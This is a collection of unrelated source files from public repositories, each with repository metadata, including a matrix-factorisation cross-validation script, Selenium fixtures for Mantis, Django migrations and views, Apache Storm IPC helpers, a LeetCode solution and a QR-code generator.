e68e5d91b7780d3fad236dfa0ad58ca34d4e4f9e | 8b3ca44ee3d990233e74655b7131d616094f70c2 | /experiments/cross_validation/movielens_100K/poisson_gamma_gamma.py | cc0781ad2618e0f9db05184959fc4e28140035a0 | [] | no_license | zshwuhan/BMF_Priors | 8b8c54271285a72d2085a56a9475c0756f375e67 | 6a600da1c41f1ccde2f2ba99298b40e68fb9910a | refs/heads/master | 2021-05-13T19:10:07.203215 | 2017-12-01T13:30:21 | 2017-12-01T13:30:21 | 116,883,181 | 1 | 0 | null | 2018-01-09T23:36:13 | 2018-01-09T23:36:13 | null | UTF-8 | Python | false | false | 1,609 | py | '''
Run nested cross-validation experiment on the MovieLens 100K dataset, with
Poisson likelihood, Gamma priors, and Gamma hierarchical priors.
'''
project_location = "/Users/thomasbrouwer/Documents/Projects/libraries/"
import sys
sys.path.append(project_location)
from BMF_Priors.code.models.bmf_poisson_gamma_gamma import BMF_Poisson_Gamma_Gamma
from BMF_Priors.code.cross_validation.nested_matrix_cross_validation import MatrixNestedCrossValidation
from BMF_Priors.data.movielens.load_data import load_movielens_100K
''' Settings BMF model. '''
method = BMF_Poisson_Gamma_Gamma
R, M = load_movielens_100K()
hyperparameters = { 'a':1., 'ap':1., 'bp':1. }
train_config = {
'iterations' : 200,
'init' : 'random',
}
predict_config = {
'burn_in' : 180,
'thinning' : 1,
}
''' Settings nested cross-validation. '''
K_range = [1,2,3]
no_folds = 5
no_threads = 5
parallel = False
folder_results = './results/poisson_gamma_gamma/'
output_file = folder_results+'results.txt'
files_nested_performances = [folder_results+'fold_%s.txt'%(fold+1) for fold in range(no_folds)]
''' Construct the parameter search. '''
parameter_search = [{'K':K, 'hyperparameters':hyperparameters} for K in K_range]
''' Run the cross-validation framework. '''
nested_crossval = MatrixNestedCrossValidation(
method=method,
R=R,
M=M,
K=no_folds,
P=no_threads,
parameter_search=parameter_search,
train_config=train_config,
predict_config=predict_config,
file_performance=output_file,
files_nested_performances=files_nested_performances,
)
nested_crossval.run(parallel=parallel) | [
"tab43@cam.ac.uk"
] | tab43@cam.ac.uk |
ef823c380ac1dc37437cf35de1d03db83e68f33f | 0f68edfa22a0c90ae18309e50dac79e1e4c82c7f | /fixture/project.py | a5ed7c726d088aaedfaa4574869e9b2814a2c643 | [
"Apache-2.0"
] | permissive | Elen-T/Py_Mantis | 92118050b0cbdb05dadb93624a8c02c3d7f7044b | 011ec80678e111b0b83216874738727117435b37 | refs/heads/master | 2020-09-07T02:51:43.687346 | 2019-11-13T06:28:53 | 2019-11-13T06:28:53 | 220,635,272 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,745 | py | from model.project import Project
from selenium.webdriver.support.select import Select
class ProjectHelper:
def __init__(self, app):
self.app = app
def open_project_page(self):
wd = self.app.wd
wd.find_element_by_link_text("Manage").click()
wd.find_element_by_link_text("Manage Projects").click()
def authenticate(self):
wd = self.app.wd
wd.find_element_by_name("password").click()
wd.find_element_by_name("password").clear()
wd.find_element_by_name("password").send_keys("root")
wd.find_element_by_xpath(
"(.//*[normalize-space(text()) and normalize-space(.)='Password'])[1]/following::input[2]").click()
def create_project(self, project):
wd = self.app.wd
wd.find_element_by_xpath("(.//*[normalize-space(text()) and normalize-space(.)='Manage Configuration'])[1]/following::input[2]").click()
wd.find_element_by_name("name").click()
wd.find_element_by_name("name").clear()
wd.find_element_by_name("name").send_keys(project.name)
wd.find_element_by_name("status").click()
Select(wd.find_element_by_name("status")).select_by_visible_text("release")
wd.find_element_by_name("status").click()
wd.find_element_by_name("description").click()
wd.find_element_by_name("description").clear()
wd.find_element_by_name("description").send_keys(project.description)
wd.find_element_by_xpath("(.//*[normalize-space(text()) and normalize-space(.)='Description'])[1]/following::input[1]").click()
wd.implicitly_wait(10)
def return_to_view_page(self):
wd = self.app.wd
wd.find_element_by_xpath("(.//*[normalize-space(text()) and normalize-space(.)='administrator'])[1]/preceding::img[1]").click()
def logout(self):
wd = self.app.wd
wd.find_element_by_link_text("Logout").click()
def count(self):
wd = self.app.wd
#return len(wd.find_elements_by_xpath("//body//tr[]"))
return len(wd.find_elements_by_xpath("//div[@class='widget-box widget-color-blue2']/div[2]/div[1]/div[2]/table/tbody/tr"))
def delete(self):
wd = self.app.wd
def open_project_by_index(self, index):
wd = self.app.wd
self. open_project_page()
row = wd.find_elements_by_xpath("//div[@class='table-responsive']/table/tbody/tr")[index]
cell = row.find_elements_by_tag_name("td")[0]
cell.find_element_by_tag_name("a").click()
def del_project_by_index(self, index):
wd = self.app.wd
self.open_project_page()
wd.find_elements_by_css_selector("td > a[href*='manage_proj_edit_page.php?project_id']")[index].click()
wd.find_element_by_css_selector("input[value='Delete Project']").click()
wd.find_element_by_css_selector("input[value='Delete Project']").click()
"""def get_project_list(self):
wd = self.app.wd
self.open_project_page()
self.project_list = []
for element in wd.find_elements_by_xpath("//div[@class='table-responsive']/table/tr"):
cells = element.find_elements_by_tag_name("td")
name = cells[1]
description = cells[5]
self.project_list.append(Project(name=name, description=description))
return list(self.project_list)"""
def get_project_list(self):
wd = self.app.wd
self.open_project_page()
project_list = []
for el in wd.find_elements_by_css_selector("td > a[href*='manage_proj_edit_page.php?project_id']"):
id = el.get_attribute('search')[12:]
name = el.text
project_list.append(Project(name=name, id=id))
return project_list | [
"547457457545678@mail.ru"
] | 547457457545678@mail.ru |
34133b8a2f6433f58642cbe7cbcfc7c5e82631e1 | cdbaf39c58364fc9e788a17c5aa4e583829785d6 | /order/migrations/0050_auto_20160720_1126.py | 79358761b5a699a34d142440a08d94d39b48824c | [] | no_license | JaeLee18/Django_eCommerce | a0f83965166e7b75225e3b4828c3a36473a6c5c8 | 860c99ca53557c3750dafd2f4dbf8e195de4d752 | refs/heads/master | 2021-06-08T22:49:25.468838 | 2016-11-17T01:45:19 | 2016-11-17T01:45:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 718 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.6 on 2016-07-20 11:26
from __future__ import unicode_literals
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('order', '0049_auto_20160720_1125'),
]
operations = [
migrations.AlterField(
model_name='order',
name='start',
field=models.DateField(blank=True, default=datetime.datetime(2016, 7, 20, 11, 26, 19, 495304), null=True),
),
migrations.AlterField(
model_name='order',
name='uid',
field=models.CharField(default='S2B1JVEUBPFMEMYF', max_length=16, null=True),
),
]
| [
"lee2161@purdue.edu"
] | lee2161@purdue.edu |
b47cf13193324adf9fd276752b4bc7434550a170 | 90736089f21562da1fb189aa80e6ba1012682aa5 | /lab-manual/vpython-intro/programs/vpython-intro-vectors.py | f80c7638d0afecfa318a13699961ff82dbd18b63 | [] | no_license | CapaFenLisesi/Physics-For-Video-Games | e9e1a1d924f867e9bee05fae0d4557fc2abe97ad | 8ca7dda24977407055eba7d29d9da5970432ff77 | refs/heads/master | 2021-01-22T15:16:13.635568 | 2016-06-11T02:24:52 | 2016-06-11T02:24:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 262 | py | from __future__ import division
from visual import *
tennisball=sphere(pos=(0,6,0), radius=1, color=color.orange)
box(pos=(0,0,0), length=78, height=4, width=36, color=color.green)
print(tennisball.pos)
tennisball.pos=vector(32,7,-12)
print(tennisball.pos)
| [
"atitus@highpoint.edu"
] | atitus@highpoint.edu |
f10efb10e5e3e9c6b8d123106d18073cfb8124f2 | fc5dc03dccb44bc67fa1b4e4c27ba88fe7480f87 | /setup.py | c19c817fdb418c18ee7c885054261ecbb4aa78fb | [] | no_license | uchagani/pixel_ring | b1632168f825723af83fadb8bce79b1a6c940c94 | 27babb6e9f591390e89cd14f4959f8ae86ad6383 | refs/heads/master | 2021-08-15T02:40:40.308514 | 2017-11-17T06:51:01 | 2017-11-17T06:51:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,425 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""The setup script."""
from setuptools import setup, find_packages
README = \
'''
APA102 pixel ring
'''
requirements = [
'spidev'
]
setup_requirements = [
# TODO: put setup requirements (distutils extensions, etc.) here
]
test_requirements = [
'pytest'
]
setup(
name='pixel-ring',
version='0.0.1',
description="APA 102 pixel ring",
long_description=README,
author="Yihui Xiong",
author_email='yihui.xiong@hotmail.com',
url='https://github.com/respeaker/pixel_ring',
packages=find_packages(include=['pixel_ring']),
include_package_data=True,
install_requires=requirements,
entry_points={
'console_scripts': [
],
},
license="GNU General Public License v2",
zip_safe=False,
keywords='voice doa beamforming kws',
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Intended Audience :: Developers',
'License :: OSI Approved :: GNU General Public License v2 (GPLv2)',
'Natural Language :: English',
"Programming Language :: Python :: 2",
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
],
test_suite='tests',
tests_require=test_requirements,
setup_requires=setup_requirements,
)
| [
"yihui.xiong@hotmail.com"
] | yihui.xiong@hotmail.com |
f8dcb79496b226693eb440a4735a89a8bb445860 | 684b61f3405ed01b4184b222da342bd1533e4b90 | /shop/migrations/0002_auto_20200406_1505.py | 17c49a7cd1d4a26822a3030c54e37da8409a58fd | [] | no_license | Mubashar-javed/myshop | 6379d2568e969db9f8dc30354966d4054463959f | 0248c2cb6e26500b5fd1404dad45b14ebf1092ac | refs/heads/master | 2023-05-26T08:01:09.067626 | 2022-12-08T09:36:10 | 2022-12-08T09:36:10 | 254,266,547 | 0 | 0 | null | 2023-05-23T01:08:14 | 2020-04-09T03:57:41 | Python | UTF-8 | Python | false | false | 353 | py | # Generated by Django 2.2.5 on 2020-04-06 10:05
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('shop', '0001_initial'),
]
operations = [
migrations.RenameField(
model_name='product',
old_name='cereated',
new_name='created',
),
]
| [
"mubasharbravo302@gmail.com"
] | mubasharbravo302@gmail.com |
aed11a2c4d13c0d479bf8465197e8185bcd75c06 | 14f0c423c109a75a8cbd10ca8c526f1482e3e385 | /Python/Django/multuple_apps/apps/blogs/views.py | 56e65b2b27072046cd5e9fc24cc6c724cda4ae09 | [] | no_license | thisolivier/dojo-master | 21fd5d13e25321cce0558cab3b0c0335774e173c | 9486f6b2af2148a296e2a238eee2b814fe0831fe | refs/heads/master | 2021-01-01T06:47:07.162851 | 2017-09-16T00:54:05 | 2017-09-16T00:54:05 | 97,511,225 | 0 | 0 | null | 2017-09-16T00:42:26 | 2017-07-17T18:51:47 | Python | UTF-8 | Python | false | false | 734 | py | from django.shortcuts import render
# Create your views here.
def blog_root(request):
print "---> Generating root template"
return render(request, 'blogs/index.html')
def blog_new(request):
print "---> Generating new blog template"
return render(request, 'blogs/index.html')
def blog_create(request):
print "---> Generating create blog template"
return render(request, 'blogs/index.html')
def blog_num(request, number):
print "---> Generating create blog number {}".format(number)
return render(request, 'blogs/index.html')
def blog_modify(request, number, action):
print "---> Generating {}ing template for blog number {}".format(action, number)
return render(request, 'blogs/index.html') | [
"olivier.butler@gmail.com"
] | olivier.butler@gmail.com |
d0479fa248e992aff2046f147e18df724d37ad7f | 6fcfb638fa725b6d21083ec54e3609fc1b287d9e | /python/AirSage_Petrel/Petrel-master/petrel/petrel/storm.py | bd46ee3d47e13255528269e2dc4ef4455261a969 | [] | no_license | LiuFang816/SALSTM_py_data | 6db258e51858aeff14af38898fef715b46980ac1 | d494b3041069d377d6a7a9c296a14334f2fa5acc | refs/heads/master | 2022-12-25T06:39:52.222097 | 2019-12-12T08:49:07 | 2019-12-12T08:49:07 | 227,546,525 | 10 | 7 | null | 2022-12-19T02:53:01 | 2019-12-12T07:29:39 | Python | UTF-8 | Python | false | false | 16,718 | py | from __future__ import print_function
import sys
import os
import time
import socket
import logging
from collections import deque
import json
import six
storm_log = logging.getLogger('storm')
TUPLE_PROFILING = False
json_encode = lambda x: json.dumps(x)
json_decode = lambda x: json.loads(x)
BLANK_LINE_CHECK = True
# Save old stdout so we can still write to it after redirecting.
old_stdout = sys.stdout
# TODO: Get this value from a topology configuration setting.
MAX_MESSAGE_SIZE = 16777216
class StormIPCException(Exception):
pass
#reads lines and reconstructs newlines appropriately
def readMsg():
msg = ""
while True:
line = sys.stdin.readline()
if not line:
raise StormIPCException('Read EOF from stdin')
if line[0:-1] == "end":
break
msg = msg + line
return json_decode(msg[0:-1])
MODE = None
ANCHOR_TUPLE = None
#queue up commands we read while trying to read taskids
pending_commands = deque()
def readTaskIds():
if pending_taskids:
return pending_taskids.popleft()
else:
msg = readMsg()
while type(msg) is not list:
pending_commands.append(msg)
msg = readMsg()
return msg
#queue up taskids we read while trying to read commands/tuples
pending_taskids = deque()
def readCommand():
if pending_commands:
return pending_commands.popleft()
else:
msg = readMsg()
while type(msg) is list:
pending_taskids.append(msg)
msg = readMsg()
return msg
def readTuple():
cmd = readCommand()
return Tuple(cmd["id"], cmd["comp"], cmd["stream"], cmd["task"], cmd["tuple"])
def sendMsgToParent(msg):
print(json_encode(msg), file=old_stdout)
print('end', file=old_stdout)
try:
old_stdout.flush()
except (IOError, OSError) as e:
storm_log.exception(str(e))
raise StormIPCException('%s error [Errno %d] in sendMsgToParent: %s' % (
type(e).__name__,
e.errno,
str(e)))
# This function is probably obsolete with the addition of the new
# reportError() function.
# TODO: Consider getting rid of this function and call reportError() instead.
# However, need to consider the case where we are running on an older version
# of Storm where the Storm back end does not support reportError()? Can we
# detect that case and use this function instead?
def sendFailureMsgToParent(msg):
"""This function is kind of a hack, but useful when a Python task
encounters a fatal exception. "msg" should be a simple string like
"E_SPOUTFAILED". This function sends "msg" as-is to the Storm worker,
which tries to parse it as JSON. The hacky aspect is that we
*deliberately* make it fail by sending it non-JSON data. This causes
the Storm worker to throw an error and restart the Python task. This
is cleaner than simply letting the task die without notifying Storm,
because this way Storm restarts the task more quickly."""
assert isinstance(msg, six.string_types)
print(msg, file=old_stdout)
print('end', file=old_stdout)
storm_log.error('Sent failure message ("%s") to Storm', msg)
def sync():
sendMsgToParent({'command':'sync'})
def sendpid(heartbeatdir):
pid = os.getpid()
sendMsgToParent({'pid':pid})
open(heartbeatdir + "/" + str(pid), "w").close()
def emit(*args, **kwargs):
result = __emit(*args, **kwargs)
if result:
return readTaskIds()
def emitMany(*args, **kwargs):
"""A more efficient way to emit a number of tuples at once."""
global MODE
if MODE == Bolt:
emitManyBolt(*args, **kwargs)
elif MODE == Spout:
emitManySpout(*args, **kwargs)
def emitDirect(task, *args, **kwargs):
kwargs["directTask"] = task
__emit(*args, **kwargs)
def __emit(*args, **kwargs):
global MODE
if MODE == Bolt:
return emitBolt(*args, **kwargs)
elif MODE == Spout:
return emitSpout(*args, **kwargs)
def emitManyBolt(tuples, stream=None, anchors = [], directTask=None):
global ANCHOR_TUPLE
if ANCHOR_TUPLE is not None:
anchors = [ANCHOR_TUPLE]
m = {
"command": "emit",
"anchors": [a.id for a in anchors],
"tuple": None,
"need_task_ids": False,
}
if stream is not None:
m["stream"] = stream
if directTask is not None:
m["task"] = directTask
lines = []
for tup in tuples:
m["tuple"] = tup
lines.append(json_encode(m))
lines.append('end')
print(lines, '\n', file=old_stdout)
def emitBolt(tup, stream=None, anchors = [], directTask=None, need_task_ids=False):
global ANCHOR_TUPLE
if ANCHOR_TUPLE is not None:
anchors = [ANCHOR_TUPLE]
m = {
"command": "emit",
"anchors": [a.id for a in anchors],
"tuple": tup,
"need_task_ids": need_task_ids,
}
if stream is not None:
m["stream"] = stream
if directTask is not None:
m["task"] = directTask
sendMsgToParent(m)
return need_task_ids
def emitManySpout(tuples, stream=None, id=None, directTask=None, need_task_ids=False):
m = {
"command": "emit",
"tuple": None,
"need_task_ids": need_task_ids,
}
if id is not None:
m["id"] = id
if stream is not None:
m["stream"] = stream
if directTask is not None:
m["task"] = directTask
lines = []
for tup in tuples:
m["tuple"] = tup
lines.append(json_encode(m))
lines.append('end')
print(lines, '\n', file=old_stdout)
def emitSpout(tup, stream=None, id=None, directTask=None, need_task_ids=False):
m = {
"command": "emit",
"tuple": tup,
"need_task_ids": need_task_ids,
}
if id is not None:
m["id"] = id
if stream is not None:
m["stream"] = stream
if directTask is not None:
m["task"] = directTask
sendMsgToParent(m)
return need_task_ids
def ack(tup):
"""Acknowledge a tuple"""
sendMsgToParent({"command": "ack", "id": tup.id})
def ackId(tupid):
"""Acknowledge a tuple when you only have its ID"""
sendMsgToParent({"command": "ack", "id": tupid})
def fail(tup):
"""Fail a tuple"""
sendMsgToParent({"command": "fail", "id": tup.id})
def reportError(msg):
sendMsgToParent({"command": "error", "msg": msg})
def log(msg):
sendMsgToParent({"command": "log", "msg": msg})
def initComponent():
# Redirect stdout and stderr to logger instances. This is particularly
# important for stdout so 'print' statements won't crash the Storm Java
# worker.
sys.stdout = LogStream(logging.getLogger('storm.stdout'))
sys.stderr = LogStream(logging.getLogger('storm.stderr'))
setupInfo = readMsg()
storm_log.info('Task received setupInfo from Storm: %s', setupInfo)
sendpid(setupInfo['pidDir'])
storm_log.info('Task sent pid to Storm')
return [setupInfo['conf'], setupInfo['context']]
class Tuple(object):
__slots__ = ['id', 'component', 'stream', 'task', 'values']
def __init__(self, id, component, stream, task, values):
self.id = id
self.component = component
self.stream = stream
self.task = task
self.values = values
def __eq__(self, other):
if not isinstance(other, Tuple):
return False
for k in self.__slots__:
if getattr(self, k) != getattr(other, k):
return False
return True
def __ne__(self, other):
return not (self == other)
def __repr__(self):
return '<%s%s>' % (
self.__class__.__name__,
''.join(' %s=%r' % (k, getattr(self, k)) for k in sorted(self.__slots__)))
def is_heartbeat_tuple(self):
return self.task == -1 and self.stream == "__heartbeat"
def is_tick_tuple(self):
return self.task == -1 and self.stream == "__tick"
class Task(object):
def shared_initialize(self):
conf, context = initComponent()
# These values are only available with a patched version of Storm.
self.task_index = context.get('taskIndex', -1)
self.worker_port = context.get('workerPort', -1)
self.initialize(conf, context)
def report_exception(self, base_message, exception):
parameters = (
base_message,
os.environ.get('SCRIPT', sys.argv[0]),
socket.gethostname(),
'pid', os.getpid(),
'port', self.worker_port,
'taskindex', self.task_index,
type(exception).__name__,
#str(exception),
)
#message = '%s: %s (pid %d) on %s failed with %s: %s' % parameters
message = '__'.join(str(p).replace('.', '_') for p in parameters)
sendFailureMsgToParent(message)
# Sleep for a few seconds to try and ensure Storm reads this message
# before we terminate. If it does, then our message above will appear in
# the Storm UI.
time.sleep(5)
class Bolt(Task):
def __init__(self):
if TUPLE_PROFILING:
self.profiler = BoltProfiler()
else:
self.profiler = None
def initialize(self, stormconf, context):
pass
def process(self, tuple):
pass
def run(self):
global MODE
MODE = Bolt
self.shared_initialize()
profiler = self.profiler
try:
while True:
if profiler is not None: profiler.pre_read()
tup = readTuple()
if tup.is_heartbeat_tuple():
sync()
else:
if profiler is not None: profiler.post_read()
self.process(tup)
if profiler is not None: profiler.post_process()
except Exception as e:
self.report_exception('E_BOLTFAILED', e)
storm_log.exception('Caught exception in Bolt.run')
if 'tup' in locals():
# Only print the first 2000 characters of the tuple, otherwise
# the message may be too long for certain handlers (e.g.
# SysLogHandler).
storm_log.error(
'The error occurred while processing this tuple: %s',
repr(tup.values)[:2000])
class BasicBolt(Task):
def __init__(self):
if TUPLE_PROFILING:
self.profiler = BasicBoltProfiler()
else:
self.profiler = None
def initialize(self, stormconf, context):
pass
def process(self, tuple):
pass
def run(self):
global MODE
MODE = Bolt
global ANCHOR_TUPLE
self.shared_initialize()
profiler = self.profiler
try:
while True:
if profiler is not None: profiler.pre_read()
tup = readTuple()
if tup.is_heartbeat_tuple():
sync()
else:
if profiler is not None: profiler.post_read()
ANCHOR_TUPLE = tup
self.process(tup)
if profiler is not None: profiler.post_process()
ack(tup)
if profiler is not None: profiler.post_ack()
except Exception as e:
storm_log.info('Caught exception')
self.report_exception('E_BOLTFAILED', e)
storm_log.exception('Caught exception in BasicBolt.run')
if 'tup' in locals():
# Only print the first 2000 characters of the tuple, otherwise
# I've seen errors because the message is too long for
# SysLogHandler.
storm_log.error(
'The error occurred while processing this tuple: %s',
repr(tup.values)[:2000])
class Spout(Task):
def initialize(self, conf, context):
pass
def ack(self, id):
pass
def fail(self, id):
pass
def nextTuple(self):
pass
def run(self):
global MODE
MODE = Spout
self.shared_initialize()
try:
while True:
msg = readCommand()
command = msg["command"]
if command == "next":
self.nextTuple()
elif command == "ack":
self.ack(msg["id"])
elif command == "fail":
self.fail(msg["id"])
sync()
except Exception as e:
self.report_exception('E_SPOUTFAILED', e)
storm_log.exception('Caught exception in Spout.run: %s', str(e))
class BoltProfiler(object):
"""Helper class for Bolt. Implements some simple log-based counters for
profiling performance."""
MAX_COUNT = 1000
def __init__(self):
self.read_time = self.process_time = 0.0
self.num_tuples = self.total_num_tuples = 0
self.start_interval = None
def pre_read(self):
self.t1 = time.time()
if self.start_interval is None:
self.start_interval = self.t1
def post_read(self):
self.t2 = time.time()
self.read_time += self.t2 - self.t1
def post_process(self):
self.t3 = time.time()
self.process_time += self.t3 - self.t2
self.num_tuples += 1
if self.num_tuples % self.MAX_COUNT == 0 or self.t3 - self.start_interval > 1.0:
self.total_num_tuples += self.num_tuples
self.total_time = self.read_time + self.process_time
storm_log.debug(
'Bolt profile: total_num_tuples=%d, num_tuples=%d, avg_read_time=%f (%.1f%%), avg_process_time=%f (%.1f%%)',
self.total_num_tuples,
self.num_tuples,
self.read_time / self.num_tuples, self.read_time / self.total_time * 100.0,
self.process_time / self.num_tuples, self.process_time / self.total_time * 100.0)
# Clear the timing data.
self.start_interval = None
self.num_tuples = 0
self.read_time = self.process_time = 0.0
class BasicBoltProfiler(object):
"""Helper class for BasicBolt. Implements some simple log-based counters for
profiling performance."""
MAX_COUNT = 1000
def __init__(self):
self.read_time = self.process_time = self.ack_time = 0.0
self.num_tuples = self.total_num_tuples = 0
self.start_interval = None
def pre_read(self):
self.t1 = time.time()
if self.start_interval is None:
self.start_interval = self.t1
def post_read(self):
self.t2 = time.time()
self.read_time += self.t2 - self.t1
def post_process(self):
self.t3 = time.time()
self.process_time += self.t3 - self.t2
def post_ack(self):
self.t4 = time.time()
self.ack_time += self.t4 - self.t3
self.num_tuples += 1
if self.num_tuples % self.MAX_COUNT == 0 or self.t4 - self.start_interval > 1.0:
self.total_num_tuples += self.num_tuples
self.total_time = self.read_time + self.process_time + self.ack_time
storm_log.debug(
'BasicBolt profile: total_num_tuples=%d, num_tuples=%d, avg_read_time=%f (%.1f%%), avg_process_time=%f (%.1f%%), avg_ack_time=%f (%.1f%%)',
self.total_num_tuples,
self.num_tuples,
self.read_time / self.num_tuples, self.read_time / self.total_time * 100.0,
self.process_time / self.num_tuples, self.process_time / self.total_time * 100.0,
self.ack_time / self.num_tuples, self.ack_time / self.total_time * 100.0)
# Clear the timing data.
self.start_interval = None
self.num_tuples = 0
self.read_time = self.process_time = self.ack_time = 0.0
def initialize_profiling():
global TUPLE_PROFILING
TUPLE_PROFILING = storm_log.isEnabledFor(logging.DEBUG)
if TUPLE_PROFILING:
storm_log.info('Tuple profiling enabled. Will log tuple processing times.')
else:
storm_log.info('Tuple profiling NOT enabled. Will not log tuple processing times.')
class LogStream(object):
"""Object that implements enough of the Python stream API to be used as
sys.stdout and sys.stderr. Messages are written to the Python logger.
"""
def __init__(self, logger):
self.logger = logger
def write(self, message):
for line in message.split('\n'):
self.logger.error(line)
| [
"659338505@qq.com"
] | 659338505@qq.com |
5212344b23e0b6e2718d3ec852b6c3ded6518b8b | 4b097a3b3c70290d23da8281caef8d91fa70005c | /models/place.py | fadd992bd247b31ff3d3034ab36695dfc10bb67d | [] | no_license | nataliamedinat/AirBnB_clone | 8e26e2aba4318ab56eefa8fb0f7a51cb0ec10164 | 096e14361604dd1bd26139a16ecedbfc5099a757 | refs/heads/master | 2020-09-06T18:49:07.521218 | 2019-11-25T22:26:28 | 2019-11-25T22:26:28 | 220,513,132 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 381 | py | #!/usr/bin/python3
""" Place inherits from BaseModel """
from models.base_model import BaseModel
class Place(BaseModel):
""" Inherits from BaseModel class """
city_id = ""
user_id = ""
name = ""
description = ""
number_rooms = 0
number_bathrooms = 0
max_guest = 0
price_by_night = 0
latitude = 0.0
longitude = 0.0
amenity_ids = []
| [
"barbaracalle10i3@gmail.com"
] | barbaracalle10i3@gmail.com |
f1010cdff0106ff59ffa22b5b5d3ee835bf5829f | fcc88521f63a3c22c81a9242ae3b203f2ea888fd | /Python3/0689-Maximum-Sum-of-3-Non-Overlapping-Subarrays/soln-1.py | f62c0aa991d5e1a4c2f04b46e6f6e54a54e99d0f | [
"MIT"
] | permissive | wyaadarsh/LeetCode-Solutions | b5963e3427aa547d485d3a2cb24e6cedc72804fd | 3719f5cb059eefd66b83eb8ae990652f4b7fd124 | refs/heads/master | 2022-12-06T15:50:37.930987 | 2020-08-30T15:49:27 | 2020-08-30T15:49:27 | 291,811,790 | 0 | 1 | MIT | 2020-08-31T19:57:35 | 2020-08-31T19:57:34 | null | UTF-8 | Python | false | false | 996 | py | class Solution:
def maxSumOfThreeSubarrays(self, nums: List[int], k: int) -> List[int]:
idx1, idx2, idx3 = 0, k, k * 2
s1, s2, s3 = sum(nums[idx1:idx1 + k]), sum(nums[idx2:idx2 + k]), sum(nums[idx3:idx3 + k])
bests1, bests12, bests123 = s1, s1 + s2, s1 + s2 + s3
besti1 = 0
besti12 = [idx1, idx2]
besti123 = [idx1, idx2, idx3]
n = len(nums)
while idx3 + k < n:
s1 += nums[idx1 + k] - nums[idx1]
s2 += nums[idx2 + k] - nums[idx2]
s3 += nums[idx3 + k] - nums[idx3]
if s1 > bests1:
bests1 = s1
besti1 = idx1 + 1
if bests1 + s2 > bests12:
bests12 = bests1 + s2
besti12 = [besti1, idx2 + 1]
if bests12 + s3 > bests123:
bests123 = bests12 + s3
besti123 = besti12 + [idx3 + 1]
idx1 += 1
idx2 += 1
idx3 += 1
return besti123
| [
"zhang623@wisc.edu"
] | zhang623@wisc.edu |
94458562cd7bf5f91df8d4257fc676713c9cdb93 | 55c250525bd7198ac905b1f2f86d16a44f73e03a | /Python/Games/Python wow/tests/models/spells/test_buff_schema.py | 86c88aee46e4d4ca161e2602ae7dee3c807b81df | [] | no_license | NateWeiler/Resources | 213d18ba86f7cc9d845741b8571b9e2c2c6be916 | bd4a8a82a3e83a381c97d19e5df42cbababfc66c | refs/heads/master | 2023-09-03T17:50:31.937137 | 2023-08-28T23:50:57 | 2023-08-28T23:50:57 | 267,368,545 | 2 | 1 | null | 2022-09-08T15:20:18 | 2020-05-27T16:18:17 | null | UTF-8 | Python | false | false | 129 | py | version https://git-lfs.github.com/spec/v1
oid sha256:e63d9f081f022098267a17e7874b4d2fd1dcffedf91d27fcc4a3820700084f41
size 1940
| [
"nateweiler84@gmail.com"
] | nateweiler84@gmail.com |
25f5b6a0231aae43d1a222da8cce0e9794ab1980 | 3fd1c9ac583fd6c203455b31887f70ceefc898dd | /lib/qr_generator.py | 2299a1f8a538b3f962111c80a3201294f16d19be | [] | no_license | satyabratsahoo/Rover-AI | 66d354dee494152ade79fec4d73bb2cba1046958 | 162633a811f782ecacc98854b613e8d70cd056ae | refs/heads/master | 2023-02-17T19:18:13.543706 | 2021-01-20T06:22:07 | 2021-01-20T06:22:07 | 300,798,518 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,945 | py | import qrcode
from lib.file import get_full_path
from lib.common import AppConfig
from PIL import Image, ImageDraw, ImageFont
import json
def qr_generate(arg_data, out_path='', label=None, label_font=18, embed_img=None):
if embed_img is not None:
face = Image.open(get_full_path('resources', 'images', 'logo.jpg'))
qr_code = qrcode.QRCode(
error_correction=qrcode.constants.ERROR_CORRECT_H
)
qr_code.add_data(str(arg_data))
qr_code.make()
img_qr = qr_code.make_image().convert('L')
if embed_img is not None:
size = 50, 50
face = Image.open(embed_img)
face.thumbnail(size, Image.ANTIALIAS)
pos = ((img_qr.size[0] - face.size[0]) // 2, (img_qr.size[1] - face.size[1]) // 2)
img_qr.paste(face, pos)
if label is not None:
draw = ImageDraw.Draw(img_qr)
font = ImageFont.truetype("arial.ttf", label_font)
draw.text((50, img_qr.size[1] - 30), label, font=font)
img_qr.save(out_path)
def generate_rover_control_system():
qr_cfg = AppConfig().config['rover_qr_configs']
out_path = qr_cfg['out_path'].split('/')
embed_logo = qr_cfg['embed_log'].split('/')
app_name = qr_cfg['qr_app_name']
actions = qr_cfg['action_configs']
for action, value in dict(actions).items():
action_id = value['qr_action_id']
action_detail = value['qr_action_details']
qr_label = f'{app_name} - {action_id} - {action_detail}'
out_name = f'{action_id}_{action}.png'
dict_data = {'app_name': app_name,
'action_id': action_id,
'action': action,
'action_detail': action_detail}
json_data = json.dumps(dict_data)
qr_generate(json_data,
out_path=get_full_path(*out_path) + '/' + out_name,
label=qr_label, embed_img=get_full_path(*embed_logo))
generate_rover_control_system() | [
"satyabratsahoo.kc@gmail.com"
] | satyabratsahoo.kc@gmail.com |
2e0c5b56074e66f23fe0ffc2d2503078ee12ae25 | d3f073366e2b576c23b19af3b7ee891ef2913a2e | /setup-liferay/scripts/test.py | 69de5e8b841d91ca360923b66e00c7992da71cf2 | [] | no_license | bibbox/sys-bibbox-vmscripts | 84000da7f7cf52f591fcd816b0bf1dd2cc3fd33d | aa30c8c210eba245b290037541e64b98dfa633f3 | refs/heads/master | 2022-08-31T09:27:24.577800 | 2020-05-31T13:37:50 | 2020-05-31T13:37:50 | 63,229,596 | 0 | 1 | null | 2019-03-17T15:05:43 | 2016-07-13T08:40:28 | Python | UTF-8 | Python | false | false | 414 | py | import re
hosts = open("/etc/hosts", 'r')
print(str(hosts.read()))
if re.search('255\.255\.255\.255(.*)localhost', str(hosts.read())):
print('match')
else:
print('nomatch')
